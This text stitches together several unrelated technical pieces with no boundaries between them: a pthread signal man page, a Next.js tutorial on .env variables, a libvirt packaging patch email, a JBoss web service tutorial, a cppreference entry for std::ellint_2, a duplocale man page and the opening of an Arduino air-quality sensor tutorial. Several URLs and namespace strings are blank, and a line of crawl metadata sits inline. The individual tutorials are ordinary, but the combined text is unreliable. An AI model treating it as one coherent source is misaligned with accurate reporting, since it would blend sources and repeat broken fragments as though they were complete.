pthread_sigmask, pthread_kill, sigwait - handling of signals in threads
#include <pthread.h>
#include <signal.h>
int pthread_sigmask(int how, const sigset_t *newmask, sigset_t *oldmask);
int pthread_kill(pthread_t thread, int signo);
int sigwait(const sigset_t *set, int *sig);
pthread_sigmask changes the signal mask for the calling thread as described by the how and newmask arguments. If oldmask is not NULL, the previous signal mask is stored in the location pointed to by oldmask.
sigwait is a cancellation point.
On success, 0 is returned. On failure, a non-zero error code is returned.
The pthread_sigmask function returns the following error codes on error:

EINVAL - how is not one of SIG_BLOCK, SIG_UNBLOCK, or SIG_SETMASK

The pthread_kill function returns the following error codes on error:

EINVAL - signo is not a valid signal number

ESRCH - the target thread does not exist (e.g. it has already terminated)
The sigwait function never returns an error.
In this ongoing series, I am putting together a Github Repository Template for my "Go To" front-end tech stack of Next.js, React, TypeScript etc. In this installment of the series, I will get custom environment variables into our Next.js application using .env files. I will also explore how Next.js handles runtime vs build time environment variables.
Just want the Code? View the full changeset covered in this post or check out the 0.0.5 release of the repository.
One of the powerful things about Next.js is that it renders your React components on the server as well as in the browser. This allows you to leverage the servers' processing power and caching to serve up the React content (mostly) the same as if it was rendered only in the browser. Server Rendering also helps with SEO and a host of other things. (See this helpful graphic about the tradeoffs and benefits of server rendering with respect to rendering time).
Additionally, certain backend code can also be isolated to only the server - getServerSideProps, API Routes, etc. This allows us to, for example, query a database. However, we wouldn't want to expose our database credentials to the browser client. That would be bad. Very bad. Previously, the only way to accomplish this with Next.js was utilizing Runtime Configuration to inject environment variables into your app. However, with the release of Next 9.4, we have a far easier and more universal approach leveraging .env files. In this post, I'll explore the new environment variables support and add some very basic environment variables to my Github Repository Template.
First, I'll create a new file in the project root named .env and add the following content:

# Base Environment Variables
NEXT_PUBLIC_THEME_BACKGROUND="#f6f7f9"
NEXT_PUBLIC_THEME_FONT_COLOR="rgba(0, 0, 0, 0.87)"
NEXT_PUBLIC_THEME_GREETING_EMOJI="🔥"
MY_SECRET="This is top secret"
Restarting the app via npm run dev, I see that Next.js loads the file (without having to install any other packages - thanks Next.js!):
These variables are now available on process.env inside the Next.js application. Only variables that start with NEXT_PUBLIC will be available on the browser client. All variables will be available in server code.
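Conceptually (a toy sketch, not Next.js internals), the exposure rule is a simple prefix filter: only names starting with NEXT_PUBLIC_ survive into the client bundle.

```javascript
// Toy illustration of the exposure rule (not Next.js internals):
// only names with the NEXT_PUBLIC_ prefix are forwarded to the browser.
function clientVisible(env) {
  return Object.fromEntries(
    Object.entries(env).filter(([name]) => name.startsWith("NEXT_PUBLIC_"))
  );
}

const visible = clientVisible({
  NEXT_PUBLIC_THEME_GREETING_EMOJI: "🔥",
  MY_SECRET: "This is top secret",
});

console.log(visible); // { NEXT_PUBLIC_THEME_GREETING_EMOJI: '🔥' }
```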
To illustrate consuming public environment variables, I'm going to introduce some basic styling to the application. In the next part of the series, I'll leverage these variables for Material-UI themes.
Start by creating a file in the /pages directory called _document.tsx with the following content:
// /pages/_document.tsx
import React from 'react';
import Document, {
  Html,
  Head,
  Main,
  NextScript,
} from 'next/document';

class MyDocument extends Document {
  render() {
    return (
      <Html>
        <Head>
          {/* Inject the public theme variables into a global style tag */}
          <style>{`
            body {
              background: ${process.env.NEXT_PUBLIC_THEME_BACKGROUND};
              color: ${process.env.NEXT_PUBLIC_THEME_FONT_COLOR};
            }
          `}</style>
        </Head>
        <body>
          <Main />
          <NextScript />
        </body>
      </Html>
    );
  }
}

export default MyDocument;
Next.js allows you to override the base html template using the _document.tsx file (learn more). For the purpose of this tutorial, I'm just going to add a style tag to leverage the environment variables. Restarting the application with npm run dev, I see the following (note the background and font color change):
Now, technically, the _document.tsx is only rendered on the server, so I'll update src/screens/IndexContent.tsx to control the emoji to ensure the variable is read on the client as well.
import React from 'react';

interface IndexProps {
  greeting: string
}

const IndexContent: React.FC<IndexProps> = (props) => {
  const { greeting } = props;
  return (
    <div>
      <h1>
        {greeting} {process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI} !
      </h1>
    </div>
  );
};

export default IndexContent;
Reloading the page, I see the following (note the 🔥 emoji vs the 👋):
I have now illustrated that environment variables starting with NEXT_PUBLIC are available on the server and the client.
One feature of .env files I liked about Create React App is that you could actually have a hierarchy of .env files. The actual .env file could provide an exhaustive set of defaulted environment variables. Then a .env.local file could be used to provide values specific to the environment. This is a great way to support 12 Factor applications. In production environments, I can simply include an environment specific .env.local that could, for example, contain the production database credentials, etc. Next.js supports this as well!
To illustrate this hierarchy, I will create a .env.local file in the project root with the following content.
# Local Environment Variables
NEXT_PUBLIC_THEME_GREETING_EMOJI="🍊"
MY_SECRET="Extra Super Secret"
Now, restarting the server via npm run dev, I see:
Note: The process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI variable took on the overridden value from within .env.local, and the other public THEME variables retained their value from the .env defaults. Neat!
Note: This hierarchy optionally goes further with .env.development and .env.production (corresponding to the value of NODE_ENV). I do not utilize this much so I won't include it in my Github Repo Template, but you can read more about it here.
Note: You should never commit passwords, API keys, and other secrets into Github. If you adopt this default approach, ensure that your .env.local file is added to your .gitignore file. If you use the .env file for defaults and do not include any secrets, you can check that into source code. Just be sure to remove it from .gitignore if it is present.
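To make the cascade concrete, here is a rough sketch of the override behavior. This is a hypothetical mini-parser for illustration, not Next.js's actual loader, but the override order is the same: .env supplies defaults and .env.local wins.

```javascript
// Hypothetical mini-loader to illustrate the cascade; Next.js's real
// loader is more thorough, but the override order is the same.
function parseEnv(text) {
  const out = {};
  for (const line of text.split("\n")) {
    const m = line.match(/^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*"?([^"]*)"?\s*$/);
    if (m) out[m[1]] = m[2];
  }
  return out;
}

const base = parseEnv('NEXT_PUBLIC_THEME_GREETING_EMOJI="🔥"\nMY_SECRET="This is top secret"');
const local = parseEnv('NEXT_PUBLIC_THEME_GREETING_EMOJI="🍊"');

// .env is loaded first, then .env.local overrides it.
const merged = { ...base, ...local };

console.log(merged.NEXT_PUBLIC_THEME_GREETING_EMOJI); // 🍊
console.log(merged.MY_SECRET); // This is top secret
```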
Next, I want to confirm that environment variables that do not start with NEXT_PUBLIC are only available on the server.
To illustrate this, I'll add some logging and leverage Next.js's getServerSideProps in /pages/index.tsx. Note: We cannot use getServerSideProps AND getStaticProps in the same page component, so I have removed the latter.
import React from 'react';
import {
  NextPage,
  GetServerSidePropsContext,
  GetServerSidePropsResult,
} from 'next';
import IndexContent from '~/screens/IndexContent';

interface IndexProps {
  greeting: string
}

const IndexPage: NextPage<IndexProps> = (props: IndexProps) => {
  const { greeting } = props;
  console.log(`Inside IndexPage Render component. Browser: ${!!process.browser}`);
  console.log(process.env.MY_SECRET);
  console.log(process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI);
  return (
    <IndexContent greeting={greeting} />
  );
};

export async function getServerSideProps(
  context: GetServerSidePropsContext
): Promise<GetServerSidePropsResult<IndexProps>> {
  console.log(`Inside getServerSideProps. Browser: ${!!process.browser}`);
  console.log(process.env.MY_SECRET);
  console.log(process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI);
  return {
    props: { greeting: 'Hello From The Server' }, // will be passed to the page component as props
  };
}

export default IndexPage;
The above will log out MY_SECRET and NEXT_PUBLIC_THEME_GREETING_EMOJI as well as tell me if we're running in the browser or server.
Reloading this page, the server outputs:
Whereas the client outputs:
As we can see, MY_SECRET is available to the IndexPage component when the page is rendered on the server, but not when rendered on the client. Also, note that MY_SECRET is available inside of getServerSideProps which is never run on the client.
As we saw in the previous example, MY_SECRET is technically available inside of the IndexPage component when rendered on the server. However, you should not attempt to directly use it in your component for rendering purposes. Since MY_SECRET will not be available on the client when it renders, React will trigger a Content did not match error because the client and the server will render different output. Also, through this error, you may leak your secrets meant only for the server.
To illustrate this error case, I can pass process.env.MY_SECRET as the value of the greeting prop of IndexContent.
// /pages/index.tsx
...
return (
  <IndexContent greeting={process.env.MY_SECRET || ''} />
);
...
In the browser, this will produce:
Additionally, I get the content mismatch error between the client and the server.
Note that the value of MY_SECRET is exposed because it is part of the server output. Thus anyone viewing the page can look at the server-rendered response and see our secret. Do not do this. If an environment variable does not start with NEXT_PUBLIC, only use it in server-specific contexts like getServerSideProps, API Routes, etc.
For extra confidence, if I do a production build of the application, I want to check the bundles for the values of the environment variables.
rm -rf .next && npm run build
Notice the console message that .env and .env.local are being read at build time. This is potentially worrisome.
Now I'll search the production build bundles for the values of private and public environment variables:
Searching for the value of MY_SECRET:
grep -rn "Extra Super Secret" .next/
This yields nothing, whereas searching for the value of NEXT_PUBLIC_THEME_GREETING_EMOJI:

grep -rn "🍊" .next/

.next//server/static/1gu-CLKzeq3pp_TQegMjc/pages/index.js:126: return __jsx("div", null, __jsx("h1", null, greeting, "🍊", "!"));
.next//server/static/1gu-CLKzeq3pp_TQegMjc/pages/index.js:141: console.log("🍊");
.next//server/static/1gu-CLKzeq3pp_TQegMjc/pages/index.js:150: console.log("🍊");
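What the bundler did to produce those hits can be sketched like this. This is a toy stand-in for build-time inlining, not actual Next.js/webpack internals: occurrences of process.env.NEXT_PUBLIC_* in the source are replaced with literal strings, while everything else is left alone.

```javascript
// Rough sketch of build-time inlining of public variables:
// process.env.NEXT_PUBLIC_* references become string literals.
function inlinePublicEnv(source, env) {
  return source.replace(
    /process\.env\.(NEXT_PUBLIC_[A-Z0-9_]+)/g,
    (whole, name) => (name in env ? JSON.stringify(env[name]) : whole)
  );
}

const bundled = inlinePublicEnv(
  'console.log(process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI); console.log(process.env.MY_SECRET);',
  { NEXT_PUBLIC_THEME_GREETING_EMOJI: "🍊" }
);

console.log(bundled);
// console.log("🍊"); console.log(process.env.MY_SECRET);
```

Note that MY_SECRET is untouched: it does not match the public prefix, so it is left as a runtime lookup.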
As we can see, our secret environment variable is not exposed in the build bundle, whereas our public one is completely replaced, even on the server. This means public environment variables are interpolated at build time and private environment variables are read at runtime. Private variables never get bundled. However, this also means that public environment variables cannot be changed without running a whole new build. This may not be ideal in certain CI/CD cases where we want to create a single build and deploy it to different environments (QA, Staging, etc.) with different environment variables. Let's see if we can achieve runtime interpolation of public variables similar to that of private environment variables.
We will leverage Next.js Runtime Configuration to achieve this. Note: As stated before, in earlier versions of Next.js, the only way to work with Environment Variables was to leverage Runtime Configuration. This required a separate dotenv loader dependency to work with the .env files. It worked, but was cumbersome. Now we can use it for what it was designed to do.
First, I'll create a next.config.js file in the project root with the following contents:
// /next.config.js
module.exports = {
  serverRuntimeConfig: {},
  publicRuntimeConfig: {
    // Will be available on both server and client
    greeting_emoji: process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI,
  },
};
Next I'll update the IndexContent component to utilize the publicRuntimeConfig rather than consume the environment variable directly.
import React from 'react';
import getConfig from 'next/config';

const { publicRuntimeConfig } = getConfig();

interface IndexProps {
  greeting: string
}

const IndexContent: React.FC<IndexProps> = (props) => {
  const { greeting } = props;
  console.log(publicRuntimeConfig); // Note: this console log runs on both server and client
  return (
    <div>
      <h1>
        {greeting} {publicRuntimeConfig.greeting_emoji} !
      </h1>
    </div>
  );
};

export default IndexContent;
As a reminder, the contents of .env.local are:
# Local Environment Variables
NEXT_PUBLIC_THEME_GREETING_EMOJI="🍊"
MY_SECRET="Extra Super Secret"
Next I'll do a production build via npm run build and search again for the values of the Environment Vars:
grep -rn "Extra Super Secret" .next/
Still nothing. Perfect.
grep -rn "🍊" .next/
We have a few remaining results that still directly use the Env Var, but we also have:
"runtimeConfig":{"greeting_emoji":"🍊"}, ...
This is the runtimeConfig. As before, the Environment Variable is interpolated at build time. However, the 🍊 value here is simply the initial state.
If we run the production build, we will see:
Finally, I'll update the .env.local file with some new content to show that build time values are overwritten at runtime:
# Local Environment Variables
NEXT_PUBLIC_THEME_GREETING_EMOJI="🍍"
MY_SECRET="DEPLOY TIME SECRET"
Then, without creating a new build, I simply start the production build again via npm start. Reloading the browser, I see:
On the backend, I see:
Note: The 🍊 is from console logging process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI, which was interpolated at build time. The 🍍, however, is from console logging the publicRuntimeConfig, which is evaluated at runtime. Also, note MY_SECRET has the value of "DEPLOY TIME SECRET". Try changing the values for both of these variables in .env.local and restart to see them change without building. It is slick.
So, what did we learn?
Now that we have figured out Next.js's new approach to environment variables, we'll include this in our Github Repository Template project. View the full changeset covered in this post or check out the 0.0.5 release of the repository.
In the next part of this series, I will introduce Material-UI.
What approach do you take to securely store your .env (or .env.local) files for QA and Production environments?
Image Credit: Photo by Polina Tankilevitch from Pexels
On Tue, Mar 29, 2011 at 10:46:59PM +0800,
> Heh I forgot to make an rpm before pushing and this broke, the following
> is needed to package the iohelper introduced in commit
> e886237af5df963a07cb7c03119b4eaea540f0e9

Since that doesn't seem compiled conditionally, that looks safe:

diff --git a/libvirt.spec.in b/libvirt.spec.in
index b6b96aa..7dcbe8f 100644
--- a/libvirt.spec.in
+++ b/libvirt.spec.in
@@ -984,6 +984,7 @@ fi
 %endif

 %attr(0755, root, root) %{_libexecdir}/libvirt_parthelper
+%attr(0755, root, root) %{_libexecdir}/libvirt_iohelper
 %attr(0755, root, root) %{_sbindir}/libvirtd
 %{_mandir}/man8/libvirtd.8*

Daniel

--
Daniel Veillard | libxml Gnome XML XSLT toolkit
daniel veillard com | Rpmfind RPM search engine | virtualization library
A while back, I was assigned to work on a project on which I needed to create a simple web service that would run in JBoss App Server. As I searched the web, I didn't find any detailed tutorial that could help me. Eventually I figured out all the pieces I had to design and implement in order to get such a web service working. I decided to summarize the things I learned in this article, not only for my own record-keeping purposes, but also to help others who need similar information.
The intention of this article is to provide a detailed tutorial on the following topics:
I hope readers will enjoy this article! If you have any questions or comments, please leave them in the FAQ section.
While I was searching for detailed tutorials, I received great help from this guide. The shortcoming of that guide was the lack of certain details. While they may be very obvious to some advanced developers, without these details a lot of beginners can get confused. This article attempts to fill these gaps. I recommend readers also review that guide after reading my article.
This tutorial requires setup and configuration of the following software packages:
I also recommend the use of Eclipse IDE. But, for this tutorial, all work can be done using a simple code editor (like UltraEdit32, Crimson Editor, or Notepad++), Command Prompt, and Apache Ant.
For my own convenience, this tutorial was created on Windows XP, and it should be relatively easy to migrate to other platforms.
Installing JDK on Windows XP is super easy: just download the MSI installer, then install it either to the default "Program Files" location or directly to "C:\". After installing JDK, it is recommended to configure the system variables:
After configuring the system variable, open a Command Prompt and type "java -version". The output will indicate the version of JDK installed in the system. This should help verify the success of JDK installation. After the verification, close the Command Prompt.
Installing Apache Ant is also easy: download the binary executable archive file from the Apache Ant Project web page (here), then unzip the archive file to "C:\". This will unpack the archive to "C:\apache-ant-1.7.1", which will be the base directory of Apache Ant. After the unpacking, also configure the system variables as follows:
After configuring the system variable, perform verification by opening a Command Prompt and type "ant -version". If configuration is correctly done, the output will indicate the version of Apache Ant installed in the system.
This tutorial teaches how to create web service that runs in JBoss. So installing and configuring JBoss Application Server (current version 5.0.0.GA) and JBoss Web Services (also refer as JBossWS, current version 3.0.5.GA) is also required. You can find the install packages (zip archives) in these two locations:
The process of installing JBoss is similar to installing Apache Ant: unzip the archive file to "C:\", which creates the JBoss base directory "C:\jboss-5.0.0.GA", then set the system variable "JBOSS_HOME" to that directory. Although optional, you can also add "%JBOSS_HOME%\bin" to the system variable "PATH".
The last step is to install the JBossWS package. The steps are as follows:
Now we are ready to create a simple web service. There are two ways to create web services:
In this tutorial, the approach discussed will be the bottom-up approach, because this is the easiest way to create a web service. The source code can be found in the downloads section. The steps will be discussed in the following sub-sections.
This tutorial uses Eclipse IDE and Apache Ant for building the sample project. Creating this sample project is no different from creating a simple Java HelloWorld project. After getting the sample source code, you can see that in the base directory "webservice", there are two folders:
First, let's take a look at the source file "Greeting.java". The entire source code looks like this:
package tutorial.hanbo.webservice;

import javax.jws.WebService;
import javax.jws.WebMethod;

@WebService
public class Greeting
{
    @WebMethod
    public String greetClient(String userName)
    {
        return "Greeting " + userName + "! Have a nice day...";
    }
}
If the reference libraries are not added to this project, the project won't compile in Eclipse. So take a look at the .classpath file and see all the needed reference libraries (i.e. the referencing jar files). These libraries were part of the JBoss package. They can be found in 3 different folders:
A web service has to be deployed in order for the client to access it. In this tutorial, the web service will be packaged as a war file and deployed as a servlet. The war file contains a deployment descriptor, a file named "web.xml", which specifies the URL/Servlet mapping. When a request is sent to JBoss App Server, JBoss will route the request to a specific servlet based on the URL/Servlet mapping specified in the web.xml file.
In the project's base directory, you can locate the web.xml file in src/resources sub directory. The content of this file looks like this:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"">
<web-app>
    <!-- servlet declaration -->
    <servlet>
        <servlet-name>Greeting</servlet-name>
        <servlet-class>tutorial.hanbo.webservice.Greeting</servlet-class>
    </servlet>
    <!-- servlet/URL mapping -->
    <servlet-mapping>
        <servlet-name>Greeting</servlet-name>
        <url-pattern>/*</url-pattern>
    </servlet-mapping>
</web-app>
The content of this descriptor file can be easily understood. The entire content has two parts: the servlet declaration, and the servlet mapping that binds the servlet to a URL pattern.
Next section will describe how to package the war file.
Packaging the war file can be done with Apache Ant. In the build.xml, you can find a number of targets. They are used to perform build actions. One of the targets has the name of "packaging". This is the target used to create a war file for deployment, as shown following:
<target name="packaging" >
    <war destfile="bin/greeting.war" webxml="src/resources/web.xml">
        <classes dir="bin/classes"/>
    </war>
</target>
In this target section, there is only one action to perform -- to build a war file using a task named "war". This task takes three inputs: destfile (the path of the war file to build), webxml (the deployment descriptor to bundle), and a nested classes element (the directory of compiled classes to include).
> ant packaging
Buildfile: build.xml
packaging:
[war] Building war: %project_base_directry%\bin\greeting.war
BUILD SUCCESSFUL
Total time: 1 second
Since the war file has been successfully built, it is time for deployment.
Before attempting to deploy the sample war file into JBoss App Server, you must first start the JBoss App Server. Since we are just using JBoss as a means to test a simple web service, this tutorial will not discuss how to run JBoss as a service. Instead, we will open another Command Prompt, then start the JBoss App Server in this newly opened Command Prompt.
To start the JBoss App Server, use the newly opened Command Prompt to navigate to "C:\jboss-5.0.0.GA\bin", then run the start up script "run.bat". After JBoss App Server starts up, you have to wait for a while until the Command Prompt shows output like this:
15:34:41,889 INFO [ServerImpl] JBoss (Microcontainer)
[5.0.0.GA (build: SVNTag=JBoss_5_0_0_GA date=200812041714)] Started in 5m:3s:150ms
To shut down JBoss App Server, activate the Command Prompt that runs the JBoss App Server. Press Ctrl+C to halt the execution, then close the Command Prompt.
To deploy the war file, all you need to do is copying the war file (greeting.war), then paste it in "C:\jboss-5.0.0.GA\server\default\deploy". After taking this step, you will notice the Command Prompt in which the JBoss App Server is running will output the deployment progress like this:
15:35:21,422 INFO [DefaultEndpointRegistry] register: jboss.ws:context=greeting,endpoint=GreetingWebService
15:35:22,453 INFO [TomcatDeployment] deploy, ctxPath=/greeting, vfsUrl=greeting.war
15:35:28,172 INFO [WSDLFilePublisher] WSDL published to:
file:/C:/jboss-5.0.0.GA/server/default/data/wsdl/greeting.war/GreetingService4604908665079984702.wsdl
The next step is to test the deployment. Open a browser window, then navigate to "". After the page loads up, you should be able to see section "Registered Service Endpoints" listing the detail info on the deployment of web service "GreetingWebService". Another test you can try is to see the WSDL file generated dynamically by JBossWS. For this tutorial, the link to the generated WSDL is "". It can be viewed by using the same browser window.
Undeploy the web service can be done by simply deleting the war file (greeting.war) in "C:\jboss-5.0.0.GA\server\default\deploy". Once you've done that, the Command Prompt will show the progress of undeployment:
16:51:12,229 INFO [TomcatDeployment] undeploy, ctxPath=/greeting, vfsUrl=greeting.war
16:51:13,307 INFO [DefaultEndpointRegistry] remove: jboss.ws:context=greeting,endpoint=GreetingWebService
In build.xml, two targets are provided to deploy or undeploy the web service. They are simply using Apache Ant's copy file and delete file tasks to accomplish deploy and undeploy operations. To deploy web service, use target "deploy". To undeploy web service, use target "undeploy".
If you don't test the newly created web service, you won't be able to know whether or not it is working. Since in this tutorial the web service is extremely simple, only exposing one web method that takes a string as a parameter, testing it can be done via dynamic invocation. Dynamic invocation is, as many others have remarked, "a nasty way of creating a web service client". Most of the web services in the real world utilize complicated data objects and perform complex operations. Using dynamic invocation to create code to exercise such complex web services can be extremely difficult. It is better to create web service clients by using proxy classes generated by JBossWS from WSDL and associated XSD files.
The web service client is simply a console application written in Java. I have separated this test application into a different project, called "webservice-test". This project uses the same set of reference jars as the web service project. A build.xml is provided not only for building the project on the command line, but also for running the test application. To build the project, use the command "ant compile". After building the project, to run the test application, use the command "ant run-test-app". But, before running this test app, be sure to deploy the sample web service first.
Let's take a look at the source code of the test application. The two main sections of the source code are the import statements and the main method that performs the dynamic invocation.
import javax.xml.rpc.Call;
import javax.xml.rpc.Service;
import javax.xml.rpc.ServiceFactory;
import javax.xml.rpc.ParameterMode;
import javax.xml.namespace.QName;
These imports bring in the JAX-RPC types used for dynamic invocation: ServiceFactory, Service, Call, ParameterMode, and QName.
The following code will invoke the sample web service:
public static void main(String[] argv)
{
    try
    {
        String NS_XSD = "";
        ServiceFactory factory = ServiceFactory.newInstance();
        Service service = factory.createService(
            new QName(
                "",
                "GreetingService"
            )
        );
        Call call = service.createCall(new QName(
            "",
            "GreetingPort"
        ));
        call.setTargetEndpointAddress(
            ""
        );
        call.setOperationName(
            new QName(
                "",
                "greetClient"
            )
        );
        QName QNAME_TYPE_STRING = new QName(NS_XSD, "string");
        call.setReturnType(QNAME_TYPE_STRING);
        call.addParameter(
            "arg0", QNAME_TYPE_STRING,
            ParameterMode.IN
        );
        String[] params = { "Murphy Brown" };
        String result = (String)call.invoke(params);
        System.out.println(result);
    }
    catch (Exception e)
    {
        e.printStackTrace();
    }
}
The sequence of calls is: createService() obtains a Service from the ServiceFactory, createCall() creates the Call object for the service port, setTargetEndpointAddress() points the call at the deployed endpoint, setOperationName() selects the web method to invoke, setReturnType() and addParameter() describe the method signature, and invoke() finally performs the remote call.
> ant run-test-app
Buildfile: build.xml
run-test-app:
[java] Greeting Murphy Brown! Have a nice day...
BUILD SUCCESSFUL
Total time: 8 seconds
There you go. This is how the simplest web service is created, deployed, and tested. I know in its current form the web service provides no use at all. I like to think this tutorial provides a skeleton of a web service. Any reader can use it as a starting point: add more features, deploy and test; then add more features, deploy and test again, until the final product can fulfill real users' needs.
I hope you enjoy this article as much as I enjoyed writing it.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
web.xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app xmlns=""
         xmlns:xsi=""
         xsi:schemaLocation=""
         version="2.4">
    ...
</web-app>
An alternative to dynamic invocation is generating client proxy classes from the published WSDL using the wsconsume tool: wsconsume.sh -k <wsdl-url>. The -k option keeps the generated .java sources alongside the compiled .class files, which are written to the output directory under tutorial/hanbo/webservice/.
GreetingClient.java
package tutorial.hanbo.webservice;

import tutorial.hanbo.webservice.*;

public class GreetingClient
{
    public static void main(String args[])
    {
        GreetingService service = new GreetingService();
        Greeting greeting = service.getGreetingPort();
        System.out.println("Server said: " + greeting.greetClient("Murphy Brown"));
    }
}
javac tutorial/hanbo/webservice/GreetingClient.java
wsrunclient.sh tutorial.hanbo.webservice.GreetingClient
log4j:WARN No appenders could be found for logger (org.jboss.ws.metadata.builder.jaxws.JAXWSWebServiceMetaDataBuilder).
log4j:WARN Please initialize the log4j system properly.
Server said: Greeting Murphy Brown! Have a nice day...
std::ellint_2, std::ellint_2f, std::ellint_2l
Computes the incomplete elliptic integral of the second kind of the arguments k and φ. If any argument is long double, the return type Promoted is also long double; otherwise the return type is always double.
Parameters

k - elliptic modulus or eccentricity (a floating-point or integral value)
φ - Jacobi amplitude (measured in radians)

Return value
If no errors occur, the value of the incomplete elliptic integral of the second kind of k and φ, that is \(\int_0^\varphi \sqrt{1 - k^2 \sin^2\theta}\,\mathrm{d}\theta\), is returned.
#include <cmath>
#include <iostream>

int main()
{
    double hpi = std::acos(-1) / 2;
    std::cout << "E(0,π/2) = " << std::ellint_2(0, hpi) << '\n'
              << "E(0,-π/2) = " << std::ellint_2(0, -hpi) << '\n'
              << "π/2 = " << hpi << '\n'
              << "E(0.7,0) = " << std::ellint_2(0.7, 0) << '\n'
              << "E(1,π/2) = " << std::ellint_2(1, hpi) << '\n';
}
Output:

E(0,π/2) = 1.5708
E(0,-π/2) = -1.5708
π/2 = 1.5708
E(0.7,0) = 0
E(1,π/2) = 1
External links
Weisstein, Eric W. "Elliptic Integral of the Second Kind." From MathWorld--A Wolfram Web Resource. | https://en.cppreference.com/w/cpp/numeric/special_math/ellint_2 | CC-MAIN-2018-43 | refinedweb | 150 | 68.47 |
duplocale - duplicate a locale object
#include <locale.h>

locale_t duplocale(locale_t locobj);

The duplocale() function shall create a duplicate copy of the locale object referenced by the locobj argument.
Upon successful completion, the duplocale() function shall return a handle for a new locale object. Otherwise, duplocale() shall return (locale_t)0 and set errno to indicate the error.
The duplocale() function shall fail if:
- [ENOMEM]
There is not enough memory available to create the locale object or load the locale data.
None.
None.
freelocale, newlocale, uselocale
XBD <locale.h>
First released in Issue 7.
POSIX.1-2008, Technical Corrigendum 1, XSH/TC1-2008/0077 [283,301], XSH/TC1-2008/0078 [283], and XSH/TC1-2008/0079 [301] are applied.
POSIX.1-2008, Technical Corrigendum 2, XSH/TC2-2008/0084 [753] is applied.
If 2018 taught us anything, it's that no place on Earth is free of natural disaster. With the multiple California wildfires throughout the year, surrounding cities experienced heavy air pollution.
The World Health Organization estimates that 4.6 million people die each year from causes directly attributable to air pollution. With that in mind, even being aware of air particulates and toxins wage a difficult battle. Many people often don’t realize that their towns, let alone their own homes, could be filled with tainted air.
However, in this day and age of powerful IoT technologies, any person can combat bad air quality. Sensors and microcontrollers have gotten so cheap, so small, and so simple to implement, that practically anyone can install any type of monitor or sensor in their very own home. Among other possibilities, these sensors can trigger things like alerts and notifications to spur user action.
In this tutorial, we’ll show you how easy it is to create an air quality sensor and monitor using a few low-cost electronics and PubNub Functions. The sensor will extract air quality information with multiple sensors, graph that data in real time, and even set off a speaker alarm if the air quality reaches a harmful critical point.
What You’ll Need
- Arduino Uno
- Breadboard & Wires
- Basic Speaker
- MQ-2 Smoke Detecting Sensor
- MQ-7 Carbon Monoxide Co Gas Sensor
- Air Quality Sensor Hazardous Gas Detection Module
- DHT11 Temperature and Humidity Sensor
Hardware
Arduino Uno
Arduino Uno is one of the cheapest and most popular microcontrollers available today. Since the Uno has an onboard analog-to-digital converter, the analog signals produced from our sensors can be properly read. Other popular microcontrollers do not have this feature, so that’s why we chose the Uno for this project.
Breadboard
A breadboard is a tool used to prototype and test circuits. Breadboards have two long rails (red rail for power and blue rail for ground) on each of its sides that are each connected vertically down the board. This is where engineers typically plug in a power supply and ground so that the whole rail can be easily used as a power and ground connection. At the center of the board, there are groups of 5-holed horizontal lines. Each of these lines is horizontally connected (5-hole connection) which are used for the circuit itself. You can even connect one grouping to another to make a 10-hole connection and so on and so forth.
Basic Speaker
You know what a speaker is. But here's some fun cocktail party knowledge: a speaker is essentially a piece of vibrating metal that is pulled up by a magnet when fed power and falls back down when unpowered. When the magnet is turned on and off at a specific frequency, a tone can be played. You won't need to know much about how to code one of these, but it's always nice to know!
Sensors
Each of the sensors we’re going to use operate on the same fundamental principle. A specific type of material is placed inside a sensor and an electric current is fed through it. When certain environmental conditions occur that react with the sensor’s specific material, the material’s resistance to the current increases or decreases. Thus the current will be affected and the sensor can then translate that change into proper sensor units.
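As a rough sketch of what these sensor libraries do internally: the breakout boards wire the sensing element in series with a load resistor, so the sensor's resistance can be recovered from the ADC reading with the voltage-divider formula. (The 10-bit range, 5V reference, and load resistance below are illustrative; real modules vary.)

```c
#include <assert.h>

/* Convert a 10-bit ADC reading (0-1023, 5V reference) into the sensor's
 * resistance. The MQ-series boards put the sensing element in series with
 * a load resistor RL, so Rs = RL * (Vcc - Vout) / Vout. The library then
 * maps Rs against a calibration curve to get ppm. */
static double sensor_resistance(int adc, double rl_ohms)
{
    double vout = adc * (5.0 / 1023.0);
    if (vout <= 0.0)
        return -1.0; /* open circuit / invalid reading */
    return rl_ohms * (5.0 - vout) / vout;
}
```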
Wiring
The wiring of each of these sensors follows the same pattern: connect the ground pin of the sensor to the ground of the Arduino, connect the power pin of the sensor to the 5V pin of the Arduino, and connect the data pin of the sensor to a GPIO pin on the Arduino.
You can connect the sensors exactly as we did by following the diagrams exactly.
The Code
Our code will follow three parts: Arduino sketch, publishing code, and graphing HTML code.
- The Arduino sketch will handle the direct communication between the sensors and the Arduino.
- The publishing code will relay the data received by the Arduino to the PubNub SDK for publishing.
- The HTML code will then visualize the data into a graph in real time on an HTML webpage.
Before you start, make sure you sign up for a free PubNub account. You’ll need your unique publish/subscribe keys to stream your data in real time.
Feel free to reference this project’s GitHub repository for more information!
Arduino Sketch
For the Arduino code, we will be programming in the Arduino IDE in order to utilize its serial bus capabilities and simple method call structure.
First and foremost, we must import all of the necessary libraries for each of our sensors so that we can communicate with them in the Arduino IDE.
To do this, download the .zip file from each library’s GitHub and add them to your Sketch. Then include them like so.
GitHub links: DHT11, MQ135, MQ7, MQ2
#include <dht.h>
#include <MQ135.h>
#include <MQ7.h>
#include <MQ2.h>
Then you will need to create variables and instances for each of your sensors.
//DHT11
#define DHT11_PIN 16 //place this line below the include statements

//DHT
int chk;
dht DHT;

//MQ135
float M135;
MQ135 gasSensor = MQ135(A3);

//MQ2
int pin = A0;
MQ2 mq2(pin);

//MQ7
float ppm;
MQ7 mq7(A1, 5.0);
Next, you will need to create a setup function to initialize your Arduino’s baud rate as well as initiate any sensor’s necessary setup modules (in our case the MQ2).
void setup()
{
  Serial.begin(9600);
  mq2.begin();
}
To keep our program continuously running, create a loop method with a delay of 1 second.
void loop()
{
  //rest of the code
  delay(1000);
}
